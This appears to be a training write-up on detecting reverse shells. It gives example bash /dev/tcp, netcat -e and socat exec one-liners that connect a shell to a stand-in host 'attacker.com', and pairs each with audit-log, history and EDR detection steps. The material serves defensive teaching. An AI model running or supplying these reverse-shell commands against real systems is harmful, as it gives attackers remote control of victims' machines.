> For the complete documentation index, see [llms.txt](https://karim-ashraf.gitbook.io/karim_ashraf_space/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/lets-defend/incident-responder-path/gtfobins/reverse-shell.md).

# Reverse Shell

<figure><img src="/files/hmnAeQVgCQNHA2k1JASE" alt=""><figcaption></figcaption></figure>

## **Reverse Shell Detection and Analysis**

**Reverse shells** are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.

***

## **Common Commands and Their Usage**

### **1. bash Command**

The **bash** command can establish reverse shells by leveraging `/dev/tcp` or `/dev/udp`.

**Example**:

```bash
export RHOST=attacker.com  
export RPORT=12345  
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
```

**Detection**:

* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "bash" | egrep "udp|tcp"
  ```
* **Command History**:

  ```bash
  history | grep "bash" | egrep "udp|tcp"
  cat ~/.bash_history | grep "bash" | egrep "udp|tcp"
  ```
* **EDR/XDR Logs**:\
  Monitor for **bash process creation** or **network events** involving `/dev/tcp` or `/dev/udp`.

### **2. nc (Netcat) Command**

**Netcat** is a versatile utility often used for reverse shells.

**Example**:

```bash
RHOST=attacker.com  
RPORT=12345  
nc -e /bin/sh $RHOST $RPORT
```

**Detection**:

* Focus on **`-e`** or **`-l`** parameters.
* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "nc" | grep "\-e"
  ```
* **Command History**:

  ```bash
  history | grep "nc" | grep "\-e"
  cat ~/.bash_history | grep "nc" | grep "\-e"
  ```
* **EDR/XDR Logs**:\
  Monitor **nc process creation** and check for unusual outbound connections.

### **3. socat Command**

**socat** offers more flexibility than **nc**, making it a preferred choice for advanced reverse shells.

**Example**:

```bash
RHOST=attacker.com  
RPORT=12345  
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
```

**Detection**:

* Investigate commands using **`exec`** and **`tcp-connect`**.
* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "socat" | grep -i "exec"
  ```
* **Command History**:

  ```bash
  history | grep "socat" | grep -i "exec"
  cat ~/.bash_history | grep "socat" | grep -i "exec"
  ```
* **EDR/XDR Logs**:\
  Analyze **socat processes** for suspicious parameters and unexpected network activity.

***

## **General Detection Strategies**

### **1. Audit Logs**

Continuously monitor `/var/log/audit/audit.log` for specific commands and associated parameters:

* **Commands to Track**: `bash`, `nc`, `socat`
* **Example**:

  ```bash
  cat /var/log/audit/audit.log | grep [command]
  ```

### **2. Command History**

Regularly inspect command history files for traces of suspicious commands:

* **Interactive Sessions**:

  ```bash
  history | grep [command]
  ```
* **Persistent Logs**:

  ```bash
  cat ~/.bash_history | grep [command]
  ```

### **3. EDR/XDR Solutions**

Employ EDR or XDR tools to:

* **Track Process Creation**: Identify the origin of reverse shell tools.
* **Analyze Network Activity**: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.

### **4. Network Monitoring**

Set up alerts for:

* **Unusual Outbound Connections**: Look for high-frequency requests to external IPs.
* **Known Malicious Indicators**: Monitor outbound traffic to flagged domains or IPs.

***

## **Key Takeaways**

* **Reverse shells** exploit legitimate utilities like **bash**, **nc**, and **socat** for remote control.
* **Detection** relies on monitoring suspicious **process creation**, **command execution**, and **network connections**.
* **Forensic Analysis** requires correlating data from:
  * **Audit logs** (`/var/log/audit/audit.log`).
  * **Command histories** (`history` or `.bash_history`).
  * **EDR/XDR telemetry** for process and network activity.

By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.
